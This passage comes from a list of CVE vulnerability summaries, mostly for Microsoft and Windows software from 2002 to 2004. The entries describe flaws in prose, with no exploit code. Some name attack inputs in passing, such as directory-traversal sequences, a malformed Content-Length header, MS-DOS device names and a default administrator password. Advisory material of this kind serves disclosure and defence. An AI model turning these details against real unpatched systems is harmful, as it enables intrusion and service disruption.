and 5.5, allows remote attackers to install arbitrary programs via a web page that uses certain styles and the AnchorClick behavior, popup windows, and drag-and-drop capabilities to drop the program in the local startup folder, as demonstrated by "wottapoop.html". [CVE-2004-0830] The Content Scanner Server in F-Secure Anti-Virus for Microsoft Exchange 6.21 and earlier, F-Secure Anti-Virus for Microsoft Exchange 6.01 and earlier, and F-Secure Internet Gatekeeper 6.32 and earlier allow remote attackers to cause a denial of service (service crash due to unhandled exception) via a certain malformed packet. [CVE-2004-0829] smbd in Samba before 2.2.11 allows remote attackers to cause a denial of service (daemon crash) by sending a FindNextPrintChangeNotify request without a previous FindFirstPrintChangeNotify, as demonstrated by the SMB client in Windows XP SP2. [CVE-2004-0775] Buffer overflow in WIDCOMM Bluetooth Connectivity Software, as used in products such as BTStackServer 1.3.2.7 and 1.4.2.10, Windows XP and Windows 98 with MSI Bluetooth Dongles, and HP IPAQ 5450 running WinCE 3.0, allows remote attackers to execute arbitrary code via certain service requests. [CVE-2004-0774] RealNetworks Helix Universal Server 9.0.2 for Linux and 9.0.3 for Windows allows remote attackers to cause a denial of service (CPU and memory exhaustion) via a POST request with a Content-Length header set to -1. [CVE-2004-0728] The Remote Control Client service in Microsoft's Systems Management Server (SMS) 2.50.2726.0 allows remote attackers to cause a denial of service (crash) via a data packet to TCP port 2702 that causes the server to read or write to an invalid memory address. [CVE-2004-0723] Microsoft Java virtual machine (VM) 5.0.0.3810 allows remote attackers to bypass sandbox restrictions to read or write certain data between applets from different domains via the "GET/Key" and "PUT/Key/Value" commands, aka "cross-site Java." [CVE-2004-0719] Internet Explorer for Mac 5.2.3, Internet Explorer 6 on Windows XP, and possibly other versions, does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability. [CVE-2004-0717] Opera 7.51 for Windows and 7.50 for Linux does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability. [CVE-2004-0712] The configuration tools (1) config.sh in Unix or (2) config.cmd in Windows for BEA WebLogic Server 8.1 through SP2 create a log file that contains the administrative username and password in cleartext, which could allow local users to gain privileges. [CVE-2004-0610] The Web administration interface in Microsoft MN-500 Wireless Router allows remote attackers to cause a denial of service (connection refusal) via a large number of open HTTP connections. [CVE-2004-0573] Buffer overflow in the converter for Microsoft WordPerfect 5.x on Office 2000, Office XP, Office 2003, and Works Suites 2001 through 2004 allows remote attackers to execute arbitrary code via a malicious document or website. [CVE-2004-0572] Buffer overflow in the Windows Program Group Converter (grpconv.exe) may allow remote attackers to execute arbitrary code via a shell: URL with a long filename and a .grp extension, which is not properly handled when the shell capability launches grpconv.exe. [CVE-2004-0568] HyperTerminal application for Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 does not properly validate the length of a value that is saved in a session file, which allows remote attackers to execute arbitrary code via a malicious HyperTerminal session file (.ht), web site, or Telnet URL contained in an e-mail message, triggering a buffer overflow. [CVE-2004-0567] The Windows Internet Naming Service (WINS) in Windows NT Server 4.0 SP 6a, NT Terminal Server 4.0 SP 6, Windows 2000 Server SP3 and SP4, and Windows Server 2003 does not properly validate the computer name value in a WINS packet, which allows remote attackers to execute arbitrary code or cause a denial of service (server crash), which results in an "unchecked buffer" and possibly triggers a buffer overflow, aka the "Name Validation Vulnerability." [CVE-2004-0566] Integer overflow in imgbmp.cxx for Windows 2000 allows remote attackers to execute arbitrary code via a BMP image with a large bfOffBits value. [CVE-2004-0552] Sophos Small Business Suite 1.00 on Windows does not properly handle files whose names contain reserved MS-DOS device names such as (1) LPT1, (2) COM1, (3) AUX, (4) CON, or (5) PRN, which can allow malicious code to bypass detection when it is installed, copied, or executed. [CVE-2004-0484] mshtml.dll in Microsoft Internet Explorer 6.0.2800 allows remote attackers to cause a denial of service (crash) via a table containing a form that crosses multiple td elements, and whose "float: left" class is defined in a link to a CSS stylesheet after the end of the table, which may trigger a null dereference. [CVE-2004-0475] The showHelp function in Internet Explorer 6 on Windows XP Pro allows remote attackers to execute arbitrary local .CHM files via a double backward slash ("\\") before the target CHM file, as demonstrated using an "ms-its" URL to ntshared.chm. NOTE: this bug may overlap CVE-2003-1041. [CVE-2004-0473] Argument injection vulnerability in Opera before 7.50 does not properly filter "-" characters that begin a hostname in a telnet URI, which allows remote attackers to insert options to the resulting command line and overwrite arbitrary files via (1) the "-f" option on Windows XP or (2) the "-n" option on Linux. [CVE-2004-0420] The Windows Shell application in Windows 98, Windows ME, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code by spoofing the type of a file via a CLSID specifier in the filename, as demonstrated using Internet Explorer 6.0.2800.1106 on Windows XP. [CVE-2004-0380] The MHTML protocol handler in Microsoft Outlook Express 5.5 SP2 through Outlook Express 6 SP1 allows remote attackers to bypass domain restrictions and execute arbitrary code, as demonstrated on Internet Explorer using script in a compiled help (CHM) file that references the InfoTech Storage (ITS) protocol handlers such as (1) ms-its, (2) ms-itss, (3) its, or (4) mk:@MSITStore, aka the "MHTML URL Processing Vulnerability." [CVE-2004-0379] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft SharePoint Portal Server 2001 allow remote attackers to process arbitrary web content and steal cookies via certain server scripts. [CVE-2004-0284] Microsoft Internet Explorer 6.0, Outlook 2002, and Outlook 2003 allow remote attackers to cause a denial of service (CPU consumption), if "Do not save encrypted pages to disk" is disabled, via a web site or HTML e-mail that contains two null characters (%00) after the host name. [CVE-2004-0281] Caucho Technology Resin 2.1.12 allows remote attackers to gain sensitive information and view the contents of the /WEB-INF/ directory via an HTTP request for "WEB-INF..", which is equivalent to "WEB-INF" in Windows. [CVE-2004-0215] Microsoft Outlook Express 5.5 and 6 allows attackers to cause a denial of service (application crash) via a malformed e-mail header. [CVE-2004-0213] Utility Manager in Windows 2000 launches winhlp32.exe while Utility Manager is running with raised privileges, which allows local users to gain system privileges via a "Shatter" style attack that sends a Windows message to cause Utility Manager to launch winhlp32 by directly accessing the context sensitive help and bypassing the GUI, then sending another message to winhlp32 in order to open a user-selected file, a different vulnerability than CVE-2003-0908. [CVE-2004-0212] Stack-based buffer overflow in the Task Scheduler for Windows 2000 and XP, and Internet Explorer 6 on Windows NT 4.0, allows local or remote attackers to execute arbitrary code via a .job file containing long parameters, as demonstrated using Internet Explorer and accessing a .job file on an anonymous share. [CVE-2004-0205] Buffer overflow in Microsoft Internet Information Server (IIS) 4.0 allows local users to execute arbitrary code via the redirect function. [CVE-2004-0204] Directory traversal vulnerability in the web viewers for Business Objects Crystal Reports 9 and 10, and Crystal Enterprise 9 or 10, as used in Visual Studio .NET 2003 and Outlook 2003 with Business Contact Manager, Microsoft Business Solutions CRM 1.2, and other products, allows remote attackers to read and delete arbitrary files via ".." sequences in the dynamicimag argument to crystalimagehandler.aspx. [CVE-2004-0200] Buffer overflow in the JPEG (JPG) parsing engine in the Microsoft Graphic Device Interface Plus (GDI+) component, GDIPlus.dll, allows remote attackers to execute arbitrary code via a JPEG image with a small JPEG COM field length that is normalized to a large integer length before a memory copy operation. [CVE-2004-0197] Buffer overflow in Microsoft Jet Database Engine 4.0 allows remote attackers to execute arbitrary code via a specially-crafted database query. [CVE-2004-0123] Double free vulnerability in the ASN.1 library as used in Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service and possibly execute arbitrary code. [CVE-2004-0122] Microsoft MSN Messenger 6.0 and 6.1 does not properly handle certain requests, which allows remote attackers to read arbitrary files. [CVE-2004-0121] Argument injection vulnerability in Microsoft Outlook 2002 does not sufficiently filter parameters of mailto: URLs when using them as arguments when calling OUTLOOK.EXE, which allows remote attackers to use script code in the Local Machine zone and execute arbitrary programs. [CVE-2004-0119] The Negotiate Security Software Provider (SSP) interface in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service (crash from null dereference) or execute arbitrary code via a crafted SPNEGO NegTokenInit request during authentication protocol selection. [CVE-2004-0118] The component for the Virtual DOS Machine (VDM) subsystem in Windows NT 4.0 and Windows 2000 does not properly validate system structures, which allows local users to access protected kernel memory and execute arbitrary code. [CVE-2004-0117] Unknown vulnerability in the H.323 protocol implementation in Windows 98, Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code. [CVE-2004-0115] VirtualPC_Services in Microsoft Virtual PC for Mac 6.0 through 6.1 allows local attackers to truncate and overwrite arbitrary files, and execute arbitrary code, via a symlink attack on the VPCServices_Log temporary file. [CVE-2004-0090] Unknown vulnerability in Windows File Sharing for Mac OS X 10.1.5 through 10.3.2 does not "shutdown properly," which has unknown impact and attack vectors. [CVE-2004-0069] Format string vulnerability in HD Soft Windows FTP Server 1.6 and earlier allows remote attackers to execute arbitrary code via format string specifiers in the username, which is processed by the wscanf function. [CVE-2003-1590] Unspecified vulnerability in Sun ONE (aka iPlanet) Web Server 6.0 SP3 through SP5 on Windows allows remote attackers to cause a denial of service (daemon crash) via unknown vectors. [CVE-2003-1589] Unspecified vulnerability in Sun ONE (aka iPlanet) Web Server 4.1 before SP13 and 6.0 before SP6 on Windows allows attackers to cause a denial of service (daemon crash) via unknown vectors. [CVE-2003-1582] Microsoft Internet Information Services (IIS) 6.0, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue. [CVE-2003-1579] Sun ONE (aka iPlanet) Web Server 6 on Windows, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue. [CVE-2003-1569] GoAhead WebServer before 2.1.5 on Windows 95, 98, and ME allows remote attackers to cause a denial of service (daemon crash) via an HTTP request with a (1) con, (2) nul, (3) clock$, or (4) config$ device name in a path component, different vectors than CVE-2001-0385. [CVE-2003-1567] The undocumented TRACK method in Microsoft Internet Information Services (IIS) 5.0 returns the content of the original request in the body of the response, which makes it easier for remote attackers to steal cookies and authentication credentials, or bypass the HttpOnly protection mechanism, by using TRACK to read the contents of the HTTP headers that are returned in the response, a technique that is similar to cross-site tracing (XST) using HTTP TRACE. [CVE-2003-1566] Microsoft Internet Information Services (IIS) 5.0 does not log requests that use the TRACK method, which allows remote attackers to obtain sensitive information without detection. [CVE-2003-1559] Microsoft Internet Explorer 5.22, and other 5 through 6 SP1 versions, sends Referer headers containing https:// URLs in requests for http:// URLs, which allows remote attackers to obtain potentially sensitive information by reading Referer log data. [CVE-2003-1544] Unrestricted critical resource lock in Terminal Services for Windows 2000 before SP4 and Windows XP allows remote authenticated users to cause a denial of service (reboot) by obtaining a read lock on msgina.dll, which prevents msgina.dll from being loaded. [CVE-2003-1524] PGPi PGPDisk 6.0.2i does not unmount a PGP partition when the switch user function in Windows XP is used, which could allow local users to access data on another user's PGP partition. [CVE-2003-1505] Microsoft Internet Explorer 6.0 allows remote attackers to cause a denial of service (crash) by creating a web page or HTML e-mail with a textarea in a div element whose scrollbar-base-color is modified by a CSS style, which is then moved. [CVE-2003-1484] Microsoft Internet Explorer 6.0 SP1 allows remote attackers to cause a denial of service (crash) by creating a DHTML link that uses the AnchorClick "A" object with a blank href attribute. [CVE-2003-1482] The backup configuration file for Microsoft MN-500 wireless base station stores administrative passwords in plaintext, which allows local users to gain access. [CVE-2003-1448] Memory leak in the Windows 2000 kernel allows remote attackers to cause a denial of service (SMB request hang) via a NetBIOS continuation packet. [CVE-2003-1407] Buffer overflow in cmd.exe in Windows NT 4.0 may allow local users to execute arbitrary code via a long pathname argument to the cd command. [CVE-2003-1378] Microsoft Outlook Express 6.0 and Outlook 2000, with the security zone set to Internet Zone, allows remote attackers to execute arbitrary programs via an HTML email with the CODEBASE parameter set to the program, a vulnerability similar to CAN-2002-0077. [CVE-2003-1357] ProxyView has a default administrator password of Administrator for Embedded Windows NT, which allows remote attackers to gain access. [CVE-2003-1328] The showHelp() function in Microsoft Internet Explorer 5.01, 5.5, and 6.0 supports certain types of pluggable protocols that allow remote attackers to bypass the cross-domain security model and execute arbitrary code, aka "Improper Cross Domain Security Validation with ShowHelp functionality." [CVE-2003-1326] Microsoft Internet Explorer 5.5 and 6.0 allows remote attackers to bypass the cross-domain security model to run malicious script or arbitrary programs via dialog boxes, aka "Improper Cross Domain Security Validation with dialog box." [CVE-2003-1306] Microsoft URLScan 2.5, with the RemoveServerHeader option enabled, allows remote attackers to obtain sensitive information (server name and version) via an HTTP request that generates certain errors such as 400 "Bad Request," which leak the Server header in the response. [CVE-2003-1305] Microsoft Internet Explorer allows remote attackers to cause a denial of service (resource consumption) via a Javascript src attribute that recursively loads the current web page. [CVE-2003-1233] Pedestal Software Integrity Protection Driver (IPD) 1.3 and earlier allows privileged attackers, such as rootkits, to bypass file access restrictions to the Windows kernel by using the NtCreateSymbolicLinkObject function to create a symbolic link to (1) \Device\PhysicalMemory or (2) to a drive letter using the subst command. [CVE-2003-1227] PHP remote file include vulnerability in index.php for Gallery 1.4 and 1.4-pl1, when running on Windows or in Configuration mode on Unix, allows remote attackers to inject arbitrary PHP code via a URL in the GALLERY_BASEDIR parameter, a different vulnerability than CVE-2002-1412. NOTE: this issue might be exploitable only during installation, or if the administrator has not run a security script after installation. [CVE-2003-1142] Help in NIPrint LPD-LPR Print Server 4.10 and earlier executes Windows Explorer with SYSTEM privileges, which allows local users to gain privileges. [CVE-2003-1127] Whale Communications e-Gap 2.5 on Windows 2000 allows remote attackers to obtain the source code for the login page via the HTTP TRACE method, which bypasses the preprocessor. [CVE-2003-1126] Unknown vulnerability in SunOne/iPlanet Web Server SP3 through SP5 on Windows platforms allows remote attackers to cause a denial of service. [CVE-2003-1027] Internet Explorer 5.01 through 6 SP1 allows remote attackers to direct drag and drop behaviors and other mouse click actions to other windows by using method caching (SaveRef) to access the window.moveBy method, which is otherwise inaccessible, as demonstrated by HijackClickV2, a different vulnerability than CVE-2003-0823, aka the "Function Pointer Drag and Drop Vulnerability." [CVE-2003-0995] Buffer overflow in the Microsoft Message Queue Manager (MSQM) allows remote attackers to cause a denial of service (RPC service crash) via a queue registration request. [CVE-2003-0910] The NtSetLdtEntries function in the programming interface for the Local Descriptor Table (LDT) in Windows NT 4.0 and Windows 2000 allows local attackers to gain access to kernel memory and execute arbitrary code via an expand-down data segment descriptor descriptor that points to protected memory. [CVE-2003-0909] Windows XP allows local users to execute arbitrary programs by creating a task at an elevated privilege level through the eventtriggers.exe command-line tool or the Task Scheduler service, aka "Windows Management Vulnerability." [CVE-2003-0905] Unknown vulnerability in Windows Media Station Service and Windows Media Monitor Service components of Windows Media Services 4.1 allows remote attackers to cause a denial of service (disallowing new connections) via a certain sequence of TCP/IP packets. [CVE-2003-0904] Microsoft Exchange 2003 and Outlook Web Access (OWA), when configured to use NTLM authentication, does not properly reuse HTTP connections, which can cause OWA users to view mailboxes of other users when Kerberos has been disabled as an authentication method for IIS 6.0, e.g. when SharePoint Services 2.0 is installed. [CVE-2003-0903] Buffer overflow in a component of Microsoft Data Access Components (MDAC) 2.5 through 2.8 allows remote attackers to execute arbitrary code via a malformed UDP response to a broadcast request. [CVE-2003-0897] "Shatter" vulnerability in CommCtl32.dll in Windows XP may allow local users to execute arbitrary code by sending (1) BCM_GETTEXTMARGIN or (2) BCM_SETTEXTMARGIN button control messages to privileged applications. [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled. [CVE-2003-0837] Stack-based buffer overflow in IBM DB2 Universal Data Base 7.2 for Windows, before Fixpak 10a, allows attackers with "Connect" privileges to execute arbitrary code via the INVOKE command. [CVE-2003-0824] Unknown vulnerability in the SmartHTML interpreter (shtml.dll) in Microsoft FrontPage Server Extensions 2000 and 2002, and Microsoft SharePoint Team Services 2002, allows remote attackers to cause a denial of service (response failure) via a certain request. [CVE-2003-0823] Internet Explorer 6 SP1 and earlier allows remote attackers to direct drag and drop behaviors and other mouse click actions to other windows by calling the window.moveBy method, aka HijackClick, a different vulnerability than CVE-2003-1027. [CVE-2003-0822] Buffer overflow in the debug functionality in fp30reg.dll of Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to execute arbitrary code via a crafted chunked encoded request. [CVE-2003-0821] Microsoft Excel 97, 2000, and 2002 allows remote attackers to execute arbitrary code via a spreadsheet with a malicious XLM (Excel 4) macro that bypasses the macro security model. [CVE-2003-0820] Microsoft Word 97, 98(J), 2000, and 2002, and Microsoft Works Suites 2001 through 2004, do not properly check the length of the "Macro names" data value, which could allow remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2003-0819] Buffer overflow in the H.323 filter of Microsoft Internet Security and Acceleration Server 2000 allows remote attackers to execute arbitrary code in the Microsoft Firewall Service via certain H.323 traffic, as demonstrated by the NISCC/OUSPG PROTOS test suite for the H.225 protocol. [CVE-2003-0813] A multi-threaded race condition in the Windows RPC DCOM functionality with the MS03-039 patch installed allows remote attackers to cause a denial of service (crash or reboot) by causing two threads to process the same RPC request, which causes one thread to use memory after it has been freed, a different vulnerability than CVE-2003-0352 (Blaster/Nachi), CVE-2003-0715, and CVE-2003-0528, and as demonstrated by certain exploits against those vulnerabilities. [CVE-2003-0812] Stack-based buffer overflow in a logging function for Windows Workstation Service (WKSSVC.DLL) allows remote attackers to execute arbitrary code via RPC calls that cause long entries to be written to a debug log file ("NetSetup.LOG"), as demonstrated using the NetAddAlternateComputerName API. [CVE-2003-0768] Microsoft ASP.Net 1.1 allows remote attackers to bypass the Cross-Site Scripting (XSS) and Script Injection protection feature via a null character in the beginning of a tag name. [CVE-2003-0767] Buffer overflow in RogerWilco graphical server 1.4.1.6 and earlier, dedicated server 0.32a and earlier for Windows, and 0.27 and earlier for Linux and BSD, allows remote attackers to cause a denial of service and execute arbitrary code via a client request with a large length value. [CVE-2003-0717] The Messenger Service for Windows NT through Server 2003 does not properly verify the length of the message, which allows remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2003-0712] Cross-site scripting (XSS) vulnerability in the HTML encoding for the Compose New Message form in Microsoft Exchange Server 5.5 Outlook Web Access (OWA) allows remote attackers to execute arbitrary web script. [CVE-2003-0711] Stack-based buffer overflow in the PCHealth system in the Help and Support Center function in Windows XP and Windows Server 2003 allows remote attackers to execute arbitrary code via a long query in an HCP URL. [CVE-2003-0666] Buffer overflow in Microsoft Wordperfect Converter allows remote attackers to execute arbitrary code via modified data offset and data size parameters in a Corel WordPerfect file. [CVE-2003-0665] Buffer overflow in the ActiveX control for Microsoft Access Snapshot Viewer for Access 97, 2000, and 2002 allows remote attackers to execute arbitrary code via long parameters to the control. [CVE-2003-0664] Microsoft Word 2002, 2000, 97, and 98(J) does not properly check certain properties of a document, which allows attackers to bypass the macro security model and automatically execute arbitrary macros via a malicious document. [CVE-2003-0663] Unknown vulnerability in the Local Security Authority Subsystem Service (LSASS) in Windows 2000 domain controllers allows remote attackers to cause a denial of service via a crafted LDAP message. [CVE-2003-0661] The NetBT Name Service (NBNS) for NetBIOS in Windows NT 4.0, 2000, XP, and Server 2003 may include random memory in a response to a NBNS query, which could allow remote attackers to obtain sensitive information. [CVE-2003-0659] Buffer overflow in a function in User32.dll on Windows NT through Server 2003 allows local users to execute arbitrary code via long (1) LB_DIR messages to ListBox or (2) CB_DIR messages to ComboBox controls in a privileged application. [CVE-2003-0642] WatchGuard ServerLock for Windows 2000 before SL 2.0.4 allows local users to access kernel memory via a symlink attack on \Device\PhysicalMemory. [CVE-2003-0641] WatchGuard ServerLock for Windows 2000 before SL 2.0.3 allows local users to load arbitrary modules via the OpenProcess() function, as demonstrated using (1) a DLL injection attack, (2) ZwSetSystemInformation, and (3) API hooking in OpenProcess. [CVE-2003-0605] The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function. [CVE-2003-0526] Cross-site scripting (XSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to inject arbitrary web script via a URL containing the script in the domain name portion, which is not properly cleansed in the default error pages (1) 500.htm for "500 Internal Server error" or (2) 404.htm for "404 Not Found." [CVE-2003-0525] The getCanonicalPath function in Windows NT 4.0 may free memory that it does not own and cause heap corruption, which allows attackers to cause a denial of service (crash) via requests that cause a long file name to be passed to getCanonicalPath, as demonstrated on the IBM JVM using a long string to the java.io.getCanonicalPath Java method. [CVE-2003-0519] Certain versions of Internet Explorer 5 and 6, in certain Windows environments, allow remote attackers to cause a denial of service (freeze) via a URL to C:\aux (MS-DOS device name) and possibly other devices. [CVE-2003-0513] Microsoft Internet Explorer allows remote attackers to bypass intended cookie access restrictions on a web application via "%2e%2e" (encoded dot dot) directory traversal sequences in a URL, which causes Internet Explorer to send the cookie outside the specified URL subsets, e.g. to a vulnerable application that runs on the same server as the target application. [CVE-2003-0507] Stack-based buffer overflow in Active Directory in Windows 2000 before SP4 allows remote attackers to cause a denial of service (reboot) and possibly execute arbitrary code via an LDAP version 3 search request with a large number of (1) "AND," (2) "OR," and possibly other statements, which causes LSASS.EXE to crash. [CVE-2003-0506] Microsoft NetMeeting 3.01 2000 before SP4 allows remote attackers to cause a denial of service (shutdown of NetMeeting conference) via malformed packets, as demonstrated via the chat conversation. [CVE-2003-0505] Directory traversal vulnerability in Microsoft NetMeeting 3.01 2000 before SP4 allows remote attackers to read arbitrary files via "..\.." (dot dot) sequences in a file transfer request. [CVE-2003-0503] Buffer overflow in the ShellExecute API function of SHELL32.DLL in Windows 2000 before SP4 may allow attackers to cause a denial of service or execute arbitrary code via a long third argument. [CVE-2003-0469] Buffer overflow in the HTML Converter (HTML32.cnv) on various Windows operating systems allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via cut-and-paste operation, as demonstrated in Internet Explorer 5.0 using a long "align" argument in an HR tag. [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service. [CVE-2003-0446] Cross-site scripting (XSS) in Internet Explorer 5.5 and 6.0, possibly in a component that is also used by other Microsoft products, allows remote attackers to insert arbitrary web script via an XML file that contains a parse error, which inserts the script in the resulting error message. [CVE-2003-0414] The installation of Sun ONE Application Server 7.0 for Windows 2000/XP creates a statefile with world-readable permissions, which allows local users to gain privileges by reading a plaintext password in the statefile. [CVE-2003-0413] Cross-site scripting (XSS) vulnerability in the webapps-simple sample application for (1) Sun ONE Application Server 7.0 for Windows 2000/XP or (2) Sun Java System Web Server 6.1 allows remote attackers to insert arbitrary web script or HTML via an HTTP request that generates an "Invalid JSP file" error, which inserts the text in the resulting error message. [CVE-2003-0412] Sun ONE Application Server 7.0 for Windows 2000/XP does not log the complete URI of a long HTTP request, which could allow remote attackers to hide malicious activities. [CVE-2003-0411] Sun ONE Application Server 7.0 for Windows 2000/XP allows remote attackers to obtain JSP source code via a request that uses the uppercase ".JSP" extension instead of the lowercase .jsp extension. [CVE-2003-0389] Cross-site scripting (XSS) vulnerability in the secure redirect function of RSA ACE/Agent 5.0 for Windows, and 5.x for Web, allows remote attackers to insert arbitrary web script and possibly cause users to enter a passphrase via a GET request containing the script. [CVE-2003-0353] Buffer overflow in a component of SQL-DMO for Microsoft Data Access Components (MDAC) 2.5 through 2.7 allows remote attackers to execute arbitrary code via a long response to a broadcast request to UDP port 1434. [CVE-2003-0350] The control for listing accessibility options in the Accessibility Utility Manager on Windows 2000 (ListView) does not properly handle Windows messages, which allows local users to execute arbitrary code via a "Shatter" style message to the Utility Manager that references a user-controlled callback function. [CVE-2003-0347] Heap-based buffer overflow in VBE.DLL and VBE6.DLL of Microsoft Visual Basic for Applications (VBA) SDK 5.0 through 6.3 allows remote attackers to execute arbitrary code via a document with a long ID parameter. [CVE-2003-0344] Buffer overflow in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code via / (slash) characters in the Type property of an Object tag in a web page. [CVE-2003-0306] Buffer overflow in EXPLORER.EXE on Windows XP allows attackers to execute arbitrary code as the XP user via a desktop.ini file with a long .ShellClassInfo parameter. [CVE-2003-0268] SLWebMail 3 on Windows systems allows remote attackers to identify the full path of the server via invalid requests to DLLs such as WebMailReq.dll, which reveals the path in an error message. [CVE-2003-0267] ShowGodLog.dll in SLWebMail 3 on Windows systems allows remote attackers to read arbitrary files by directly calling ShowGodLog.dll with an argument specifying the full path of the target file. [CVE-2003-0266] Multiple buffer overflows in SLWebMail 3 on Windows systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long Language parameter to showlogin.dll, (2) a long CompanyID parameter to recman.dll, (3) a long CompanyID parameter to admin.dll, or (4) a long CompanyID parameter to globallogin.dll. [CVE-2003-0232] Microsoft SQL Server 7, 2000, and MSDE allows local users to execute arbitrary code via a certain request to the Local Procedure Calls (LPC) port that leads to a buffer overflow. [CVE-2003-0231] Microsoft SQL Server 7, 2000, and MSDE allows local or remote authenticated users to cause a denial of service (crash or hang) via a long request to a named pipe. [CVE-2003-0230] Microsoft SQL Server 7, 2000, and MSDE allows local users to gain privileges by hijacking a named pipe during the authentication of another user, aka the "Named Pipe Hijacking" vulnerability. [CVE-2003-0226] Microsoft Internet Information Services (IIS) 5.0 and 5.1 allows remote attackers to cause a denial of service via a long WebDAV request with a (1) PROPFIND or (2) SEARCH method, which generates an error condition that is not properly handled. [CVE-2003-0225] The ASP function Response.AddHeader in Microsoft Internet Information Server (IIS) 4.0 and 5.0 does not limit memory requests when constructing headers, which allow remote attackers to generate a large header to cause a denial of service (memory consumption) with an ASP page. [CVE-2003-0224] Buffer overflow in ssinc.dll for Microsoft Internet Information Services (IIS) 5.0 allows local users to execute arbitrary code via a web page with a Server Side Include (SSI) directive with a long filename, aka "Server Side Include Web Pages Buffer Overrun." [CVE-2003-0223] Cross-site scripting vulnerability (XSS) in the ASP function responsible for redirection in Microsoft Internet Information Server (IIS) 4.0, 5.0, and 5.1 allows remote attackers to embed a URL containing script in a redirection message. [CVE-2003-0172] Buffer overflow in openlog function for PHP 4.3.1 on Windows operating system, and possibly other OSes, allows remote attackers to cause a crash and possibly execute arbitrary code via a long filename argument. [CVE-2003-0168] Buffer overflow in Apple QuickTime Player 5.x and 6.0 for Windows allows remote attackers to execute arbitrary code via a long QuickTime URL. [CVE-2003-0118] SQL injection vulnerability in the Document Tracking and Administration (DTA) website of Microsoft BizTalk Server 2000 and 2002 allows remote attackers to execute operating system commands via a request to (1) rawdocdata.asp or (2) RawCustomSearchField.asp containing an embedded SQL statement. [CVE-2003-0117] Buffer overflow in the HTTP receiver function (BizTalkHTTPReceive.dll ISAPI) of Microsoft BizTalk Server 2002 allows attackers to execute arbitrary code via a certain request to the HTTP receiver. [CVE-2003-0116] Microsoft Internet Explorer 5.01, 5.5 and 6.0 does not properly check the Cascading Style Sheet input parameter for Modal dialogs, which allows remote attackers to read files on the local system via a web page containing script that creates a dialog and then accesses the target files, aka "Modal Dialog script execution." [CVE-2003-0115] Microsoft Internet Explorer 5.01, 5.5 and 6.0 does not properly check parameters that are passed during third party rendering, which could allow remote attackers to execute arbitrary web script, aka the "Third Party Plugin Rendering" vulnerability, a different vulnerability than CVE-2003-0233. [CVE-2003-0114] The file upload control in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to automatically upload files from the local system via a web page containing a script to upload the files. [CVE-2003-0113] Buffer overflow in URLMON.DLL in Microsoft Internet Explorer 5.01, 5.5 and 6.0 allows remote attackers to execute arbitrary code via an HTTP response containing long values in (1) Content-type and (2) Content-encoding fields. [CVE-2003-0112] Buffer overflow in Windows Kernel allows local users to gain privileges by causing certain error messages to be passed to a debugger. [CVE-2003-0110] The Winsock Proxy service in Microsoft Proxy Server 2.0 and the Microsoft Firewall service in Internet Security and Acceleration (ISA) Server 2000 allow remote attackers to cause a denial of service (CPU consumption or packet storm) via a spoofed, malformed packet to UDP port 1745. [CVE-2003-0045] Jakarta Tomcat before 3.3.1a on certain Windows systems may allow remote attackers to cause a denial of service (thread hang and resource consumption) via a request for a JSP page containing an MS-DOS device name, such as aux.jsp. [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served. [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names. [CVE-2003-0011] Unknown vulnerability in the DNS intrusion detection application filter for Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (blocked traffic to DNS servers) via a certain type of incoming DNS request that is not properly handled. [CVE-2003-0010] Integer overflow in JsArrayFunctionHeapSort function used by Windows Script Engine for JScript (JScript.dll) on various Windows operating system allows remote attackers to execute arbitrary code via a malicious web page or HTML e-mail that uses a large array index value that enables a heap-based buffer overflow attack. [CVE-2003-0007] Microsoft Outlook 2002 does not properly handle requests to encrypt email messages with V1 Exchange Server Security certificates, which causes Outlook to send the email in plaintext, aka "Flaw in how Outlook 2002 handles V1 Exchange Server Security Certificates could lead to Information Disclosure." [CVE-2003-0002] Cross-site scripting vulnerability (XSS) in ManualLogin.asp script for Microsoft Content Management Server (MCMS) 2001 allows remote attackers to execute arbitrary script via the REASONTXT parameter. [CVE-2002-2435] The Cascading Style 